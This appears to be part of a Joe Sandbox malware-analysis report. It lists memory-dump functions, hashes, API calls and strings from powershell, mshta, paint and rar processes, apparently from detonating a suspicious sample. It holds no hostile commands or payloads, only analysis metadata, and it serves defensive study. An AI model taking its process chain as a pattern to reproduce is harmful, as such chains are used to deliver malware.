Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: de9154bc5d2f83437673e0bf81cc70f8c64743efad34a3845752fa93014ab389
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: AB116D32609B8192EB208F15F400269B7E5FB89B85F984230DF9E477A9EF3DC551CB00

Function 00007FF6F0BF07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF07DC
GetDriveTypeW.KERNEL32 ref: 00007FF6F0BF081C

Strings

:, xrefs: 00007FF6F0BF0805

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 66c3e0b18368ed52c6b718f302a14bb7ebdb5486661301eb11f00261e34a9cc3
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 1501846692C20395F720AFA0986627E63A4EF56749FC00035D56EC37D1FF3DE9048B15

Analysis Process: powershell.exePID: 1780, Parent PID: 3584COMMON

Executed Functions

Function 00007FFD99413485 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf5ae137aac3e34df341bdf956f2cb2e88e37023d5c053c7d71430bebc5e299
Instruction ID: 91a2a6894c0756165824c4054900d56cb99823f1e8766e06060f33c8737fb5f7
Opcode Fuzzy Hash: cbf5ae137aac3e34df341bdf956f2cb2e88e37023d5c053c7d71430bebc5e299
Instruction Fuzzy Hash: 98D1F352B0EBC50FE7B79B7818755607BE1EF66214B0901FBD099CB1D3E908AC09C76A

Function 00007FFD99416865 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a972bb54cc5304d8147a8a0f29c543db00479128e6e172f4dfc818fb9583682
Instruction ID: da040a4576d3a34dfd1541212de11f96082c385d0fb2eab38e69d9aa741891a5
Opcode Fuzzy Hash: 4a972bb54cc5304d8147a8a0f29c543db00479128e6e172f4dfc818fb9583682
Instruction Fuzzy Hash: 00C13C22B1EA890FEBB6DFA848655B57BD1EF65358B1401BED05DCB0D3D918EC04C346

Function 00007FFD9934BB33 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e765c092120ae046fc58791ad10754d0990c8ba92be57e9cb8abb7e3fce6f475
Instruction ID: 552a5bc05d30ac7a74246d63e951ed67d4ad5932758e1af6d0d844be7c593f43
Opcode Fuzzy Hash: e765c092120ae046fc58791ad10754d0990c8ba92be57e9cb8abb7e3fce6f475
Instruction Fuzzy Hash: 5FC1C763A0E6D64FE7669F6C58B55E83BA0EF12258B0E00FBC0984B097DD15781A8357

Function 00007FFD99413455 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db95cdd08a41a73e6bc31a972305ca04109870f486cc2d6b94feabd87b2f14a
Instruction ID: 526aefa230a476b20a729f6ae2ccaf78d7f74c4709d3e9db4b8f64c8cd94fcd7
Opcode Fuzzy Hash: 6db95cdd08a41a73e6bc31a972305ca04109870f486cc2d6b94feabd87b2f14a
Instruction Fuzzy Hash: 9481F561B0EB850FE7BB9A6848651707BD1EF66618B0901FAD08CC7193DD186C06CB6A

Function 00007FFD99413540 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0bd9532193158f6153010271636a2c086b93b7d6b8a383ab33623336b48560
Instruction ID: 8537e5df81604dd8e8ec3edd1faac45df1843bab2d48fc0046b2fb8355ecf052
Opcode Fuzzy Hash: 3b0bd9532193158f6153010271636a2c086b93b7d6b8a383ab33623336b48560
Instruction Fuzzy Hash: B8413862B0DA890FE7BADE6C44A467037D2EFB4714B0901BED09DC7283DD19AC05CB56

Function 00007FFD99349880 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399eb95226880245e23b8cba670f7e25e006d45ba5683b57ee15d5da7b8fbcd8
Instruction ID: b2eecfc2f8a1c72a7e8838fb22c3cab307b738793f7f077d69bf0b7fff69d988
Opcode Fuzzy Hash: 399eb95226880245e23b8cba670f7e25e006d45ba5683b57ee15d5da7b8fbcd8
Instruction Fuzzy Hash: 1731F331A1CB884FDB189F5C984A6A97BF0EB99711F00426FE449C3292DA30AC15CBC3

Function 00007FFD9922E540 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1921744256.00007FFD9922D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9922D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9922d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e591d5fff587f84947cb6195f3dcf0203141fb41ceb11a303cbf8a67c07195a
Instruction ID: 25f8cf079fca255c02eb760b832601b434a006af221a3b86cf9731f4f6fa97ad
Opcode Fuzzy Hash: 5e591d5fff587f84947cb6195f3dcf0203141fb41ceb11a303cbf8a67c07195a
Instruction Fuzzy Hash: 2F41253041DBC44FE76A8F2898559523FF0EF62324B5905EFD088CB1A3D629A849C793

Function 00007FFD994169DD Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0ae6312e29dd9fe6d819f334b1ae786695d3c03774f5449f2909309d9b75a0
Instruction ID: 34d07b0b8e71f85ed1f64145d055928ee3896e62a6603bf941fcf9e49a3aabf8
Opcode Fuzzy Hash: 8b0ae6312e29dd9fe6d819f334b1ae786695d3c03774f5449f2909309d9b75a0
Instruction Fuzzy Hash: 05212931B0D6894FE776DEA840605787B91DF6A358F1841BEC04DCB183C919EC41C345

Function 00007FFD993433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 8cc4b37afc9d78ccb6f6c62a154e36d628409c241ade2105c34722f64bf282c4
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 5101A73121CB0D4FD744EF0CE051AA5B7E0FB85324F10056DE58AC3695DA36E882CB46

Function 00007FFD9934A1FB Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1361cf769c89d7ff07e30088a345874606b985e0bc07e0ede67d67ccef68c7f4
Instruction ID: 34cf097abaffebc34621b9859eccd08af2333f244e77e168d998409b83b7395d
Opcode Fuzzy Hash: 1361cf769c89d7ff07e30088a345874606b985e0bc07e0ede67d67ccef68c7f4
Instruction Fuzzy Hash: E5F046B661AACC4FCB51EF2CD8690D43FA0FFE1204B0501BFD598CB062D622A85CC782

Function 00007FFD9941432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9454b82340aab8c326a0cee6e1def514208fdc866200e037413a9d14ebe25037
Instruction ID: 297ae579ff9bceacd35ac7b5add0039a061a5d70bc0df3c1b7e1c4a784a3b0d6
Opcode Fuzzy Hash: 9454b82340aab8c326a0cee6e1def514208fdc866200e037413a9d14ebe25037
Instruction Fuzzy Hash: E7F0BE32B0C6098FE7B9EB4CE4548A873E0EF5932471100BAE05DC70A7CA25EC44C786

Function 00007FFD994145E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1f3f4ca462746cdac419f2393b1fe295c8ce1602a06612df7a6e33649c2e5a
Instruction ID: 21679693eedca74c5b8b3c3cdf9bf838f201d23101433c943dabe32227a33b10
Opcode Fuzzy Hash: ce1f3f4ca462746cdac419f2393b1fe295c8ce1602a06612df7a6e33649c2e5a
Instruction Fuzzy Hash: F1F0BE32B0C5488FDB65EF4CE4508A8B7E0EF4932870100B6E159C70A3CA29AC44C785

Non-executed Functions

Function 00007FFD99348BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

O_^<, xrefs: 00007FFD99348C2A
O_^I, xrefs: 00007FFD99348C72
O_^J, xrefs: 00007FFD99348C7A
O_^6, xrefs: 00007FFD99348BFA
O_^F, xrefs: 00007FFD99348C6A

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID: O_^6$O_^<$O_^F$O_^I$O_^J
API String ID: 0-2439779554
Opcode ID: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
Instruction ID: b575352a9abbc44ed51499bed8be91106a9b4f8ca7bf59d166d55f2682346666
Opcode Fuzzy Hash: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
Instruction Fuzzy Hash: D921477B32A4165ED30177AEB8009D87380CBD827734A01B3E26DCF647DD14648B86D8

Function 00007FFD993486FA Relevance: 6.4, Strings: 5, Instructions: 100COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD99348712
O_^, xrefs: 00007FFD99348772
O_^, xrefs: 00007FFD993487C2
O_^, xrefs: 00007FFD99348722
O_^, xrefs: 00007FFD993486FA

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^
API String ID: 0-1643777136
Opcode ID: 5167a8f8cbb8801c8a804bf657af61d40fff4a8758237c91f9ea62b4592f2495
Instruction ID: 3c04c23be4344c4c4fb512569f6642f2c11134eec99ff6689503f6371a74a11a
Opcode Fuzzy Hash: 5167a8f8cbb8801c8a804bf657af61d40fff4a8758237c91f9ea62b4592f2495
Instruction Fuzzy Hash: D93177A390F6DA5FF7669E785C790D53F90AF2225CB1B01FAC8D94F193ED1464268203

Function 00007FFD99348955 Relevance: 5.2, Strings: 4, Instructions: 158COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD99348A7A
O_^, xrefs: 00007FFD993489C9
O_^, xrefs: 00007FFD99348A2A
O_^, xrefs: 00007FFD99348AC2

Memory Dump Source

Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-934926442
Opcode ID: e66af2cb8ba224046a07a48ddaba2c7ab0218062da6ddd557ecb19f3856a941f
Instruction ID: fc6384227c49f22e3c494b05b0779979526f5e91cf086ca1e97e609feb702aa0
Opcode Fuzzy Hash: e66af2cb8ba224046a07a48ddaba2c7ab0218062da6ddd557ecb19f3856a941f
Instruction Fuzzy Hash: DB4198A3A0FAD61FF7265E6448791947F91EF52398B0E12FAC0D54F193E958681B8203

Analysis Process: mshta.exePID: 6492, Parent PID: 3852COMMON

Executed Functions

Function 0000019BE2EE0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.1739672384.0000019BE2EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000019BE2EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_19be2ee0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: d1545c9b9c13203767f0dcd40d8d3ca15671f7d2012727fe2ab8ddd6f59ab132
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 9C90021449941659D41411D25D953EC50446388250FD448805416A0544D68D42A65153

Analysis Process: powershell.exePID: 8364, Parent PID: 8124COMMON

Executed Functions

Function 00007FFD994317D9 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1905039023.00007FFD99430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd99430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d6db50ee1e1c4cf04057d3d530323b6df3cb85f124819c3488b5d09b864c39e
Instruction ID: 684b28e7a2ebd28c1cd4afe7ac13fad9a9f1f885bf6cc4c3cc5638665583a2ec
Opcode Fuzzy Hash: 8d6db50ee1e1c4cf04057d3d530323b6df3cb85f124819c3488b5d09b864c39e
Instruction Fuzzy Hash: C9222522B0EBCD0FE7679B7858625B47BE1EF5A214B0801FBD089C71D7E918A849C356

Function 00007FFD99364DD3 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cdb763ef914d561052020f5cc6627aef6787d567b4502f446f0d8bc4e73e1a
Instruction ID: 2647936d5d95ec6a4b2814f9ee440a6675a89b1eaafbb6475416343bde90cf3f
Opcode Fuzzy Hash: 03cdb763ef914d561052020f5cc6627aef6787d567b4502f446f0d8bc4e73e1a
Instruction Fuzzy Hash: D861E431E09A4C8FDB55EFACD8A55ACBBF1EF5A314F14416ED049D7292CA35A802CB41

Function 00007FFD99363945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: bfe8b3f28c6fd669a1ec3b7178ff450bbb5c1d330914ea5a3b3e3021fa1e36ff
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8401A73021CB0C4FD744EF0CE051AA5B7E0FB85324F10056DE58AC3695D636E881CB46

Function 00007FFD99366278 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd99360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
Instruction ID: 683bb62e81558e649150ed88c838364db13591850f8bb2237a129a21c3a6738f
Opcode Fuzzy Hash: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
Instruction Fuzzy Hash: 45F0653275C6048FDB5CAA1CF8529B573D1EB99324B10017EF48BC3697D927F842C686

Analysis Process: rar.exePID: 7908, Parent PID: 5956COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1236
Total number of Limit Nodes:	40

Executed Functions

Function 00007FF623DE54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

stdin, xrefs: 00007FF623DE6236
default.sfx, xrefs: 00007FF623DE60F4
OFF, xrefs: 00007FF623DE5E4B
SFX, xrefs: 00007FF623DE60CC
rar.log, xrefs: 00007FF623DE5CE5
NUL, xrefs: 00007FF623DE5DB3
EML, xrefs: 00007FF623DE5D6B
*.%ls, xrefs: 00007FF623DE59AF
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF623DE5935
*?., xrefs: 00007FF623DE598C
+, xrefs: 00007FF623DE6535
VER, xrefs: 00007FF623DE5EBA
ERR, xrefs: 00007FF623DE5D40
stdin, xrefs: 00007FF623DE672D
SND, xrefs: 00007FF623DE5D11
LOG, xrefs: 00007FF623DE5CD0

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: e25bc916542cdb153589367977d5dfacecc582e23138fd62ba3d520b544c70ae
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 0CC20676E0C38281EE649FA48C471BDAE51BF01794F584AB5CA4EE72C6DF6DE904C312

Function 00007FF623DD1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

%s%s , xrefs: 00007FF623DD2A46
exe, xrefs: 00007FF623DD1897
BK, xrefs: 00007FF623DD19C5
sfx, xrefs: 00007FF623DD1884
rar, xrefs: 00007FF623DD18AA
q:, xrefs: 00007FF623DD19DA
,6, xrefs: 00007FF623DD2F83
.ext, xrefs: 00007FF623DD18C0

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 5356308a5213ef53ebe9158b3a8dbaf6b722f78413d02868b50865a4794f0cd4
Instruction ID: 97a01183c98457fd66dd6984e261acc40bba13b8860acd280baa6cd452abfea3
Opcode Fuzzy Hash: 5356308a5213ef53ebe9158b3a8dbaf6b722f78413d02868b50865a4794f0cd4
Instruction Fuzzy Hash: 1EE2EF23A08ACA85EF20DB65CC422FD37A1FB49788F4506B2DA4DA7796DF38D545C702

Function 00007FF623E148CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF623E14AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF623DECC90), ref: 00007FF623E14AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1492E
GetVersionExW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF623E07E7D), ref: 00007FF623E14993
LoadLibraryW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1499F

Strings

rarlng.dll, xrefs: 00007FF623E1493A

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
Instruction ID: de1ba77603c06ddf3d3b7105cdcb8043bdf5d6179490a5ebc61631169e14ed8b
Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
Instruction Fuzzy Hash: 2A312031B1864285FF649B21EC422E96764FF45784F804076EACDA2B95DF3DE98DCB01

Function 00007FF623E04398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E043D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E04402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E0440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E0443E

Strings

AppData, xrefs: 00007FF623E043F7
Software\WinRAR\Paths, xrefs: 00007FF623E043BC

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
